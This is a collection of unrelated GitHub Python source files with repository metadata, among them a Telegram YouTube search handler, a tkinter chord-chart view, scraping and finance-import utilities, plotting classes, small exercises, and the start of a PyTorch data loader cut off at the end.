message.reply_text(\"**•♪╎عـءراً .. يجب عليك كتابـة نص البحث بعد الامـر ...** !\")\n return\n query = message.text.split(None, 1)[1]\n m = await message.reply_text(\"**•♪╎ جـاري .. البحـث ðŸ�° : **\")\n results = YoutubeSearch(query, max_results=4).to_dict()\n i = 0\n text = \"\"\n while i < 4:\n text += f\"Title - {results[i]['title']}\\n\"\n text += f\"Duration - {results[i]['duration']}\\n\"\n text += f\"Views - {results[i]['views']}\\n\"\n text += f\"Channel - {results[i]['channel']}\\n\"\n text += f\"https://youtube.com{results[i]['url_suffix']}\\n\\n\"\n i += 1\n await m.edit(text, disable_web_page_preview=True)\n except Exception as e:\n await message.reply_text(str(e))\n","repo_name":"Mgffgf/zed","sub_path":"ZedMusic/modules/ytsearch.py","file_name":"ytsearch.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31765578201","text":"from modules.model.SBSongPart import SBSongPart\nfrom modules.model.SBCommonTypes import convertSBPartTypeToString\nfrom modules.view.SBViewElement import SBViewElement\nfrom modules.view.SBViewChord import SBViewChord\nfrom modules.controller.SBCtrlNewPartDialog import SBCtrlNewPartDialog\nfrom modules.view.SBViewPlayButton import SBViewPlayButton\nimport tkinter as tk\n\nclass SBViewSongPart(SBViewElement):\n def __init__(self, master, canvas, songpart, row=0):\n SBViewElement.__init__(self,100,50+row*130, 600, 120)\n self.master = master\n self.songpart = songpart\n self.canvas = canvas\n #self.width = 600\n #self.height = 120\n self.row = row\n self.rect = self.canvas.create_rectangle(self.x, self.y, self.x + self.width, self.y + self.height, fill=\"#EEEEEE\")\n self.canvas.create_text(self.x+self.width/2, self.y + 10, text=self.songpart.getName())\n self.canvas.create_text(self.x+self.width/2, self.y + 30, text=\"[\" + convertSBPartTypeToString(self.songpart.getPartType()) + \"]\")\n self.canvas.create_text(self.x+10, self.y+10, text=\"cycles: \"+str(self.songpart.getNrRepeats()), anchor=tk.W, fill=\"dark grey\")\n self.view_chords = []\n self.am_i_selected = False\n self.selected_viewchord = None\n self.view_textlines = []\n self.view_textline_elements = []\n\n\n self.but_play = SBViewPlayButton(self.master, self.canvas, self)\n\n x_offset = 0\n self.col = 0\n cnt = 0\n chord_row = 0\n\n textline_elements = []\n for tls in self.songpart.getTextlines():\n if (not(tls == None)):\n splt = self.splitUpTextline(tls)\n print(splt)\n for te in splt:\n textline_elements.append(te)\n\n #tl = self.splitUpTextline(self.songpart.getTextlines())\n for e in songpart.getChords():\n nc = SBViewChord(self.master, self.canvas, e, self, chord_row, self.col)\n\n if (cnt < len(textline_elements)):\n self.createTextLineElement(textline_elements[cnt+1], nc)\n\n self.view_chords.append(nc)\n me_coords = self.canvas.coords(self.rect)\n if (nc.getXMax() > me_coords[2]):\n chord_row = chord_row + 1\n nc.setRow(chord_row)\n self.col = 0\n nc.setCol(self.col)\n\n\n #col = col + e.getLengthInBars() + 1\n cnt = cnt + 1\n self.col = self.col + e.getLengthInBars()\n\n self.canvas.tag_bind(self.rect, '', self.say_hu)\n self.canvas.tag_bind(self.rect, '', self.iAmSelected)\n\n self.createViewTextlines()\n\n def getSongpart(self):\n return self.songpart\n\n def createViewTextlines(self):\n self.view_textlines = []\n txt_row = 0\n for e in self.songpart.getTextlines():\n tl = self.canvas.create_text(self.x + 10, self.y + 130 + 20*txt_row, text=e,\n anchor=tk.W, fill=\"dark grey\")\n 
self.view_textlines.append(tl)\n txt_row = txt_row + 1\n\n def createTextLineElement(self, textline_el, viewchord):\n vtl = self.canvas.create_text(viewchord.x + 10, viewchord.y + 30, text=self.removeCR(textline_el),\n anchor=tk.W, fill=\"dark grey\")\n self.view_textline_elements.append(vtl)\n\n def splitUpTextline(self,tl):\n t = \"\"\n t = tl.split(\"%\")\n return t\n\n def removeCR(self, text):\n return text.strip(\"\\n\")\n\n def createViewContent(self):\n self.view_textlines = []\n txt_row = 0\n chord_row = 0\n for e in self.songpart.getTextlines():\n num_chords = e.count(\"%\")\n for i in range(num_chords):\n chrds = self.songpart.getChords()\n e = chrds[i]\n nc = SBViewChord(self.master, self.canvas, e, self, chord_row, self.col)\n self.view_chords.append(nc)\n self.canvas.create_text(self.x + 10, self.y + 110 + 20 * txt_row, text=e,\n anchor=tk.W, fill=\"dark grey\")\n self.view_textlines.append(e)\n txt_row = txt_row + 1\n chord_row = chord_row + 1\n self.col = 0\n\n def update(self):\n self.col = 0\n outcolor = \"black\"\n if (self.am_i_selected == True):\n outcolor = \"red\"\n else:\n outcolor = \"black\"\n self.canvas.itemconfig(self.rect, outline=outcolor)\n\n chord_row = 0\n for e in self.view_chords:\n me_coords = self.canvas.coords(self.rect)\n if (e.getXMax() > me_coords[2]):\n chord_row = chord_row + 1\n e.setRow(chord_row)\n self.col = 0\n e.setCol(self.col)\n\n self.col = self.col + e.getChord().getLengthInBars()\n\n\n self.createViewTextlines()\n\n def addChord(self, chord):\n self.songpart.addChord(chord)\n nc = SBViewChord(self.master, self.canvas, chord, self, 0, self.col)\n self.view_chords.append(nc)\n\n\n def say_hu(self, event):\n\n print(\"Edit Songpart\")\n\n d = SBCtrlNewPartDialog(self.master, self.songpart, self)\n\n self.master.wait_window(d.top)\n self.update()\n print(\"repeats = \" + str(self.songpart.getNrRepeats()))\n\n def select(self, trueorfalse):\n self.am_i_selected = trueorfalse\n if (trueorfalse == False):\n if (not (self.selected_viewchord == None)):\n self.selected_viewchord.select(False)\n self.selected_viewchord.update()\n self.selected_viewchord = None\n self.update()\n\n def iAmSelected(self, event):\n if (not (self.selected_viewchord == None)):\n self.selected_viewchord.select(False)\n self.selected_viewchord = None\n\n self.master.reselectSongpart(self)\n\n def selectChord(self, viewchord):\n if (not (self.selected_viewchord == None)):\n self.selected_viewchord.select(False)\n self.selected_viewchord.update()\n self.selected_viewchord = viewchord\n self.selected_viewchord.select(True)\n self.update()\n self.selected_viewchord.update()\n if (self.am_i_selected == False):\n self.master.reselectSongpart(self)\n\n def deleteSelectedChord(self):\n if (self.selected_viewchord == None):\n print(\"can't delete chord, none selected!\")\n else:\n ind = self.view_chords.index(self.selected_viewchord)\n self.selected_viewchord.deleteGeometry()\n self.view_chords.pop(ind)\n self.selected_viewchord = None\n self.songpart.deleteChord(ind)\n self.update()\n\n\n\n\n\n\n","repo_name":"DrMarkusVoss/SongBoard","sub_path":"modules/view/SBViewSongPart.py","file_name":"SBViewSongPart.py","file_ext":"py","file_size_in_byte":6817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20187863854","text":"import logging\nimport sys\nimport csv\nimport os\nimport json\nfrom lxml.html import fromstring\nimport requests\nfrom itertools import cycle\nimport traceback\nimport re\n\n\n# module for obtaining a 
list of free proxy servers from free-proxy-list.net\ndef get_proxies() -> list:\n url = 'https://free-proxy-list.net/'\n response = requests.get(url)\n parser = fromstring(response.text)\n proxies = list()\n for i in parser.xpath('//tbody/tr')[:10]:\n if i.xpath('.//td[7][contains(text(),\"yes\")]'):\n proxy = \":\".join([i.xpath('.//td[1]/text()')[0], i.xpath('.//td[2]/text()')[0]])\n proxies.append(proxy)\n return proxies\n\n\n# simple helper to manually set the logging configuration\ndef set_logging() -> None:\n stdout_handler = logging.StreamHandler(sys.stdout)\n handlers = [stdout_handler]\n\n # basicConfig returns None, so there is nothing useful to assign here\n logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s:%(name)s: %(levelname)s : %(message)s',\n handlers=handlers\n )\n\n\n# CSV store util\ndef store_to_csv(data: dict, outfile: str, headers: list) -> None:\n with open(outfile, 'a', encoding=\"utf8\") as writeFile:\n writer = csv.DictWriter(writeFile, delimiter=',', lineterminator='\\n', fieldnames=headers)\n if writeFile.tell() == 0:\n writer.writeheader()\n writer.writerow(data)\n\n\n# json config loader\ndef load_json_config(config_file: str) -> dict:\n try:\n json_file = f\"config_files/{config_file}.json\"\n with open(json_file) as f:\n loaded_config = json.load(f)\n print(f\"Loading config file {config_file}\")\n\n return loaded_config\n\n except Exception as e:\n print(f\"Error in loading config file. {e}\")\n\n\n# function for converting a numeric string to int\ndef convert_str_to_number(x: str) -> list:\n try:\n extracted_str = re.findall(r'[\\d.,K,k,M,m]+', x, re.IGNORECASE)\n cleaned_str = [r.strip().replace(\",\", \"\") for r in extracted_str]\n total_stars = 0\n num_map = {'K': 1000, 'M': 1000000, 'B': 1000000000}\n converted = []\n if len(cleaned_str) > 1:\n for x in cleaned_str:\n if x.isdigit():\n converted.append(int(x))\n else:\n if len(x) > 1:\n total_stars = int(x[:-1]) * num_map.get(x[-1].upper(), 1)\n converted.append(total_stars)\n else:\n if ''.join(cleaned_str).isdigit():\n converted.append(int(''.join(cleaned_str)))\n else:\n if len(''.join(cleaned_str)) > 1:\n total_stars = int(''.join(cleaned_str)[:-1]) * num_map.get(''.join(cleaned_str)[-1].upper(), 1)\n converted.append(total_stars)\n\n return converted\n\n except ValueError as ve:\n\n return []\n","repo_name":"jczuniga/realestate_scraper","sub_path":"util/gen_util.py","file_name":"gen_util.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73415965479","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 16:21:00 2019\n\n@author: ark4d\n\"\"\"\n# comment blocks describe the code below them\n\nclass MainGrapher():\n def __init__(self, style):\n self.style = style\n \n def _create_line(self, ax):\n ax.axhline(1.0, linestyle='--', alpha=0.3, color='green')\n \n def _apply_style(self, ax):\n ax.grid(alpha=self.style['grid']['alpha'])\n y_lim = self.style['y']['lim']\n ax.set_ylim(*y_lim)\n \n ax.set_yticks(self.style['y']['ticks'])\n ax.xaxis.set_tick_params(rotation=self.style['ticks_x']['rotation'])\n if self.style['spine']['remove']:\n for spine in ax.spines.items():\n spine[1].set_visible(False)\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(self.style['ticks_x']['fontsize']) \nclass DateTimeGrapher(MainGrapher):\n '''\n Class for creating graph with datetime\n '''\n def __init__(self, style, locator, formatter):\n '''\n Initialization\n Parameters\n ---------\n style : dict-type object\n see README for 
more details\n locator : matplotlib.dates.Locator\n What will be used as a locator in the plot\n formatter : matplotlib.dates.Formatter\n Object that will format date\n '''\n super().__init__(style)\n self.locator = locator\n self.formatter = formatter\n \n def create_graph(self, ax, data, color):\n '''\n Applies style and creates plot on given axis. \n \n Parameters\n ----------\n ax : matplotlib.axes\n axes on which the graph will be plotted\n data : pandas.DataFrame\n index - datetime\n values - values of interest\n color : str\n Hex of color or a standard mpl name (e.g. yellow, red, purple) \n '''\n ax.plot(data.index, data.values, color=color)\n self._apply_style(ax)\n self._create_line(ax)\n if self.locator:\n ax.xaxis.set_major_locator(self.locator)\n if self.formatter:\n ax.xaxis.set_major_formatter(self.formatter)\n return ax\n\nclass BasicGrapher(MainGrapher):\n def __init__(self, style):\n '''\n Initialization\n Parameters\n ---------\n style : dict-type object\n see README for more details\n '''\n super().__init__(style)\n \n def create_graph(self, ax, data, color, line=True):\n '''\n Applies style and creates plot on given axis. \n \n Parameters\n ----------\n ax : matplotlib.axes\n axes on which the graph will be plotted\n data : pandas.DataFrame\n index - datetime\n values - values of interest\n color : str\n Hex of color or a standard mpl name (e.g. yellow, red, purple) \n line : bool\n If true shows line at 1.0\n '''\n ax.plot(data.index, data.values, color=color)\n self._apply_style(ax)\n if line:\n self._create_line(ax)\n return ax\n\nclass PieCharter():\n pass\n # TODO: implement pie charter","repo_name":"Arkady-A/TimeAnalyst","sub_path":"timeAnalyst/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6007515401","text":"import csv\nimport datetime\nfrom configparser import ConfigParser\nfrom io import StringIO\n\nfrom freeagent_transferwise_importer.freeagent import FreeAgent\nfrom freeagent_transferwise_importer.transferwise import BorderlessAccount\n\nconfig = ConfigParser()\nconfig.read(\"config.ini\")\n\ntransferwise = BorderlessAccount(**config[\"transferwise\"])\nfreeagent = FreeAgent(**config[\"freeagent\"])\n\naccount_id, currencies = transferwise.get_account_id_and_currencies()\nfor currency in currencies:\n bank_account_id, last_updated = freeagent.get_or_create_bank_account(currency)\n transactions = transferwise.get_transactions(account_id, currency, last_updated)\n statement_file = StringIO()\n statement_csv = csv.writer(statement_file)\n for transaction in transactions:\n statement_csv.writerow(\n [\n datetime.datetime.strptime(\n transaction[\"date\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"\n ).strftime(\"%d/%m/%Y\"),\n transaction[\"amount\"][\"value\"],\n transaction[\"details\"][\"description\"],\n ]\n )\n statement_csv.writerow(\n [\n datetime.datetime.strptime(\n transaction[\"date\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"\n ).strftime(\"%d/%m/%Y\"),\n transaction[\"totalFees\"][\"value\"],\n f'Fee for {transaction[\"details\"][\"description\"]}',\n ]\n )\n statement = statement_file.getvalue()\n if statement:\n freeagent.add_transactions(bank_account_id, statement)\n 
statement_file.close()\n","repo_name":"cnorthwood/freeagent-transferwise-importer","sub_path":"freeagent_transferwise_importer/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37819181097","text":"from selenium import webdriver\nimport time\nfrom LastGame import LastGame\nfrom Game import Game\nimport traceback\nfrom Constants import XPath\nimport ExecReq\nimport datetime\n\ndef parseLastCntWin(elems, isFirstTeam):\n countElem = 0\n listRes = list()\n while 5 > len(listRes) and countElem < len(elems):\n elems[countElem].click()\n driver.switch_to.window(driver.window_handles[2])\n print(\"----------------------------\")\n kf = ExecReq.getKF(driver)\n if kf == False or (kf[0] < 1.3 or kf[1] < 1.3):\n countElem += 1\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n continue\n scoreFirst = ExecReq.getElemByXPath(\"//*[@class='odd']\", driver)\n scoreSec = ExecReq.getElemByXPath(\"//*[@class='even']\", driver)\n timeStart = time.time()\n while len(scoreFirst.text.split()) < 6 or len(scoreSec.text.split()) < 6:\n if time.time() - timeStart > 5:\n break\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n elems[countElem].click()\n driver.switch_to.window(driver.window_handles[2])\n scoreFirst = ExecReq.getElemByXPath(\"//*[@class='odd']\", driver)\n scoreSec = ExecReq.getElemByXPath(\"//*[@class='even']\", driver)\n if (len(scoreFirst.text.split()) < 6 or len(scoreSec.text.split()) < 6):\n countElem += 1\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n continue\n lastGame = LastGame(\"\", [scoreFirst.text, scoreSec.text])\n print(\"----------------------------\")\n if lastGame.isCleanScore(isFirstTeam=isFirstTeam):\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n print(\"this game bad\")\n return False\n listRes.append(lastGame)\n driver.close()\n driver.switch_to.window(driver.window_handles[1])\n countElem += 1\n driver.switch_to.window(driver.window_handles[1])\n return listRes\n\ndef skip(i, driver, countSkip = 2):\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n return i + countSkip\n\ndef parseMaths(driver, XPathBtn, dropLigue):\n try:\n driver.get('https://www.myscore.ru/basketball/')\n ExecReq.clickGetElem(driver, XPathBtn)\n time.sleep(1)\n elemsLigue = driver.find_elements_by_xpath(\"//table[@class='basketball']\")\n j = 0\n lstGame = list()\n i = 0\n elems = ExecReq.getElemsByXPath(XPath.allGame, driver)\n while j < len(elemsLigue):\n ligueName = elemsLigue[j].text.split('\\n')[1]\n print(ligueName)\n countGame = elemsLigue[j].text[len(elemsLigue[j].text.split('\\n')[0] + \"\\n\" + ligueName):].count(':')\n print(countGame)\n startI = i\n while i < startI + (countGame) * 2 and i < len(elems):\n resCmd = elems[i].text + elems[i + 1].text\n elemBase = elems[i]\n resCmd = resCmd.translate({ord(c): None for c in '\\n'})\n if len(resCmd.split('(Ж)')) > 1:\n i += 2\n continue\n timeGame = resCmd.split()[0].split(\":\")\n timeGame = int(timeGame[0]) * 60 + int(timeGame[1])\n print(resCmd)\n try:\n dropLigue.index(ligueName)\n i += 2\n print('drop')\n continue\n except:\n pass\n ExecReq.clickElem(elems[i])\n driver.switch_to.window(driver.window_handles[1])\n\n kf = ExecReq.getKF(driver)\n if kf == False or (kf[0] < 1.3 or kf[1] < 1.3):\n i = skip(i, driver)\n continue\n elif kf[0] > kf[1]:\n isFirstTeam = False\n elif kf[1] > kf[0]:\n isFirstTeam = 
True\n else:\n isFirstTeam = True\n print(\"kf teams equal\")\n\n ''''''\n ExecReq.clickGetElem(driver, XPath.clickH2H)\n ExecReq.clickGetElem(driver, XPath.clickHomeGame)\n while ExecReq.clickGetElem(driver, XPath.clickMoreHomeGame):\n pass\n\n elem = ExecReq.getElemsByXPath(XPath.homeGame, driver)\n home = parseLastCntWin(elems=elem, isFirstTeam=isFirstTeam)\n if home == False:\n i = skip(i, driver)\n continue\n ''''''\n ''''''\n print('away')\n ExecReq.clickGetElem(driver, XPath.clickAwayGame)\n while ExecReq.clickGetElem(driver, XPath.clickMoreAwayGame):\n pass\n\n elem = ExecReq.getElemsByXPath(XPath.awayGame, driver)\n away = parseLastCntWin(elems=elem, isFirstTeam=isFirstTeam)\n if away == False:\n i = skip(i, driver)\n continue\n ''''''\n newGame = Game(timeMin=timeGame, teams=resCmd, lstHome=home, lstAway=away, elemBase = elemBase)\n lstGame.append(newGame)\n print('add')\n\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n i += 2\n j += 1\n return lstGame\n except:\n print('Error:\\n', traceback.format_exc())\n\n\ndriver = webdriver.Chrome(\"C:\\\\Users\\\\anton\\\\Desktop\\\\chromedriver.exe\")\n#lstGame = parseMaths(driver, XPath.btnToday)\nlstGame = list()\ngoGameNextDay = True\nwhile True:\n if (datetime.datetime.now().hour >= 1):\n goGameNextDay = True\n if (datetime.datetime.now().hour >= 20):\n lstGame.extend(parseMaths(driver, XPath.btnNextDay, ['США: НБА']))\n goGameNextDay = False\n while len(lstGame) > 0:\n for game in lstGame:\n if game.checkTime():\n print(game.teams)\n try:\n lstGame.remove(game)\n except:\n print('Error:\\n', traceback.format_exc())\n\ndriver.close()\n\n # clickElem(driver, game.elemBase)\n # driver.switch_to.window(driver.window_handles[1])\n # kf = getElemByXPath(\"//*[@id='tab-prematch-odds']\", driver)\n # floatKfFirst = 0.0\n # floatKfSec = 0.0\n # try:\n # floatKfFirst = float(kf.text.split('\\n')[1])\n # floatKfSec = float(kf.text.split('\\n')[3])\n # except:\n # print('Error1111:\\n', traceback.format_exc())\n # driver.close()\n # driver.switch_to.window(driver.window_handles[0])\n # try:\n # lstGame.remove(game)\n # except:\n # print('Error:\\n', traceback.format_exc())\n # continue\n # driver.close()\n # driver.switch_to.window(driver.window_handles[0])\n # if (game.checkGame(floatKfFirst, floatKfSec)):\n # print(game.teams)\n # else:\n # print(\"nope\" + str(game.teams))","repo_name":"AZch/ParseMyScoreBasketball","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30588148982","text":"class Car:\n\n def __init__(self, make, model, year):\n self.make = make\n self.model = model\n self.year = year\n self.odometer = 0\n self.fuel = 70\n\n def drive(self, km):\n l = km / 10\n if l <= self.fuel:\n self.__add_distance(km)\n self.__subtract_fuel(l)\n print('Let’s drive!')\n else:\n print('Need more fuel, please, fill more!')\n\n def __add_distance(self, km):\n self.odometer += km\n\n def __subtract_fuel(self, l):\n self.fuel -= l\n\nmy_car = Car('Honda', 'Civic', 2004)\nmy_car.drive(700)\nmy_car.drive(701)\n","repo_name":"Argen-Aman/chapter5task3","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43078561499","text":"import requests\nimport pandas as pd\nfrom datetime import datetime\nimport time\n\ndef 
retrieve_data(symbol, frequency):\n url = f\"https://open-api.coinglass.com/public/v2/perpetual_market?symbol={symbol}\"\n headers = {\n \"accept\": \"application/json\",\n \"coinglassSecret\": \"\"\n }\n\n while True:\n try:\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n data = response.json()[\"data\"][symbol]\n df = pd.DataFrame(data, columns=[\n \"exchangeName\",\n \"price\",\n \"updateTime\",\n \"shortVolUsd\",\n \"longVolUsd\",\n \"buyTurnoverNumber\",\n \"sellTurnoverNumber\",\n ])\n # Sum up values from all exchanges\n price = df[\"price\"].mean()\n buy_turnover_number = df[\"buyTurnoverNumber\"].sum()\n sell_turnover_number = df[\"sellTurnoverNumber\"].sum()\n short_vol_usd = df[\"shortVolUsd\"].sum()\n long_vol_usd = df[\"longVolUsd\"].sum()\n # Convert updateTime to readable date and time\n update_time = datetime.fromtimestamp(df[\"updateTime\"].iloc[0]/1000)\n # Store necessary data in a new DataFrame\n df = pd.DataFrame({\n \"Price\": price,\n \"Symbol\": symbol,\n \"shortVolUsd\": short_vol_usd,\n \"longVolUsd\": long_vol_usd,\n \"buyTurnoverNumber\": buy_turnover_number,\n \"sellTurnoverNumber\": sell_turnover_number,\n \"NetVolUsd\": long_vol_usd - short_vol_usd,\n \"NetTurnoverNumber\": buy_turnover_number - sell_turnover_number,\n \"NetPosition\": (long_vol_usd - short_vol_usd) / price,\n \"UpdateTime\": update_time\n }, index=[0])\n print(df)\n # Log the data to a CSV file\n filename = f\"{symbol}_data.csv\"\n df.to_csv(filename, mode=\"a\", header=False)\n except Exception as e:\n print(f\"An error has occurred: {e}. Restarting the function...\")\n time.sleep(frequency)\n\n\nif __name__ == \"__main__\":\n retrieve_data(\"BTC\", 6)\n","repo_name":"suleymanozkeskin/Cryptocurrency_Perpetual_Market_Tracker_Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31424838585","text":"# -*- coding:utf-8 -*-\n# by look1z\nimport hashlib\na = 'RgYDMllaKzGC'\nbbb = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\nccc = []\nfor i in range(52):\n ccc.append(i)\n\nmydict = dict(zip(bbb, ccc))\nmydict2 = dict(zip(ccc, bbb))\nb = []\nc = []\nd = []\nfor i in a:\n b.append(i)\n\nfor j in range(12):\n # t = ord(b[j])-ord('a')\n\n t = (21*mydict[b[j]]+8)%52\n t = mydict2[t]\n c.append(t)\nprint(c)\n\npwd = 'BEsTAFFiKney'\ncheckcode = hashlib.md5(pwd.encode()).hexdigest()\nprint(checkcode)\n","repo_name":"look1z/wuziqi","sub_path":"UI/111.py","file_name":"111.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25601303315","text":"import sys\ninput = sys.stdin.readline\nn, m = map(int, input().split())\ntrees = list(map(int, input().split()))\n\ncutter_height = 0\nstart = 0\nend = max(trees)\n\nwhile start <= end:\n amount_tree = 0\n middle = (start + end) // 2\n amount_tree = sum(tree-middle if tree > middle else 0 for tree in trees)\n \n if amount_tree >= m:\n cutter_height = middle\n start = middle + 1\n else:\n end = middle - 1\nprint(cutter_height)","repo_name":"joong8812/baekjoon-for-algorithm","sub_path":"백준/Silver/2805. 
나무 자르기/나무 자르기.py","file_name":"나무 자르기.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18917384993","text":"from builtins import map\nfrom builtins import range\nfrom builtins import object\nfrom geocal_swig import *\nfrom itertools import chain\nimport multiprocessing\nimport time\n\nclass InterestPointGridRawWrap(object):\n '''Wrapper around _interest_point_grid_raw that can be pickled. \n We can't directly use pool.map on _interest_point_grid_raw because\n python can't pickle a instance function'''\n def __init__(self, fd, img, mask, number_grid_line, \n number_grid_sample, border):\n self.fd = fd\n self.img = img\n self.mask = mask\n self.number_grid_line = number_grid_line\n self.number_grid_sample = number_grid_sample\n self.border = border\n def __call__(self, i):\n res = []\n for j in range(self.number_grid_sample):\n if(self.mask is None):\n r = self.fd._interest_point_grid_raw(self.img, i, j,\n self.number_grid_line, self.number_grid_sample, self.border)\n else:\n r = self.fd._interest_point_grid_raw(self.img, self.mask, i, j,\n self.number_grid_line, self.number_grid_sample, self.border)\n if(r is not None):\n res.append(r)\n return res\n \n# Add some useful functions to FeatureDetector\ndef interest_point_grid(self, img, number_grid_line, number_grid_sample,\n border=0, mask=None, pool = None):\n '''This is used to generate a set of interest points. We divide\n the Image into the given number of grid line and samples, and in\n each grid point find the point with the interest point with the\n greatest weight.\n\n You can optionally specify a border to exclude in the search, this\n is useful when the points will be used for image matching and we\n want to exclude points too close to the edge where the image matching\n will fail.\n\n You can optionally supply a Mask, this will be used to exclude points\n based on for example a land/water mask or a cloud mask. If this is not\n supplied, we look at every point.\n\n You can optionally specify a multiprocessing.Pool if you want to \n collect these points in parallel.\n '''\n res = []\n index_list = list(range(number_grid_line))\n tstart = time.time()\n func = InterestPointGridRawWrap(self, img, mask,\n number_grid_line, number_grid_sample, \n border)\n if(pool):\n res = pool.map(func, index_list)\n else:\n res = list(map(func, index_list))\n # This next command flattens the list\n return list(chain.from_iterable(res))\n\nsetattr(FeatureDetector, \"interest_point_grid\", interest_point_grid)\n\n__all__ = []\n","repo_name":"Cartography-jpl/geocal","sub_path":"python/lib/feature_detector_extension.py","file_name":"feature_detector_extension.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21495354496","text":"'''\nComplete the following 3 searching problems using techniques\nfrom class and from Ch15 of the textbook website\n'''\n\n#1. (7pts) Write code which finds and prints the longest\n# word in the provided dictionary. 
If there are more\n# than one longest word, print them all.\n\ndictionary_list = []\n\ndictionary = open(\"dictionary.txt\", \"r\")\nfor line in dictionary:\n dictionary_list.append(line.strip())\ndictionary.close()\n\ntop_length = 0\nlongest_words = []\nfor i in range(len(dictionary_list)):\n if len(dictionary_list[i]) > top_length:\n longest_words = []\n top_length = len(dictionary_list[i])\n longest_words.append(dictionary_list[i])\n elif len(dictionary_list[i]) == top_length:\n longest_words.append(dictionary_list[i])\nprint(longest_words)\n\n\n#2. (10pts) Write code which finds\n# The total word count AND average word length\n# in \"AliceInWonderLand.txt\"\n\nimport re\ndef split_line(line):\n # This function takes in a line of text and returns a list of words in the line\n return re.findall('[A-Za-z]+(?:\\'[A-Za-z]+)?', line)\nalice_list = []\nfile = open(\"AliceInWonderLand.txt\", \"r\")\nfor line in file:\n file_line = split_line(line)\n for l in range(len(file_line)):\n alice_list.append(file_line[l])\n\nprint(\"There are\", len(alice_list), \"words in Alice and Wonder Land, \", end=\"\")\n\n\nindex = 0\nfor j in range(len(alice_list)):\n index += len(alice_list[j])\naverage_length = index / len(alice_list)\nprint(\"with an average word length of\", average_length, \"letters.\")\n\n\n# CHOOSE ONE OF THE FOLLOWING TWO PROBLEMS\n\n#3 (13pts) How many times does \"Cheshire\" occur in\"AliceInWonderLand.txt\"?\n# How many times does \"Cat\" occur?\n# How many times does \"Cheshire\" immediately followed by \"Cat\" occur?\nprint(alice_list)\ndef how_many_times(input):\n index = 0\n for k in range(len(alice_list)):\n if alice_list[k].upper() == str(input).upper():\n index += 1\n return index\ndef how_many_sequence(first_word, second_word):\n index = 0\n for m in range(len(alice_list)):\n if alice_list[m].upper() == str(first_word).upper() and m < len(alice_list) - 1:\n if alice_list[m + 1].upper() == str(second_word).upper():\n index += 1\n return index\n\n\nprint(\"The word Cheshire appears\", how_many_times(\"Cheshire\"), \"times.\")\nprint(\"The words Cat appears\", how_many_times(\"Cat\"), \"times.\")\nprint(\"The words Cheshire and Cat appear in sequence\", how_many_sequence(\"Cheshire\", \"Cat\"), \"times.\")\n\n\n#### OR #####\n\n#3 (13pts)Find the most frequently occurring\n# seven letter word in \"AliceInWonderLand.txt\"\n\n# Challenge problem (for fun). What words appear in the text of \"Alice in Wonderland\" that DO NOT occur in \"Alice Through the Looking Glass\". Make a list. 
You can substitute this for any of the above problems.\n\n\n\n","repo_name":"ParkerCS/ch15-searches-cmoog","sub_path":"ch15ProblemSet.py","file_name":"ch15ProblemSet.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34024034868","text":"\n# \"abc\" -> \"cba\"\n# \"\" -> \"\"\n\n# inv(\"abc\") -> inv(\"bc\") + \"a\" = \"cb\" + \"a\" = \"cba\"\n# inv(\"bc\") = inv(\"c\") + \"b\" = \"c\" + \"b\" = \"cb\"\n# inv(\"c\") = inv(\"\") + \"c\"\n# inv(\"\")\n# \"\"\n\n\n\n# inv(s) = s if s is empty\n# inv(s) = inv(s without the first character) + the first character\n\ndef inv(s):\n if len(s) == 0:\n return s\n else:\n return inv(s[1:]) + s[0]\n\nprint(inv(\"abc\"))\n","repo_name":"krenevych/ClassWork","sub_path":"Stat1/L8/l8_4b.py","file_name":"l8_4b.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11338145912","text":"from torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\n\nfrom monai.transforms import AddChannel\n\nimport numpy as np\n\n# since this file is called from an external file, the import path has to be specified again\nfrom Dataloaders.MRI_loader import get_data_dicts, 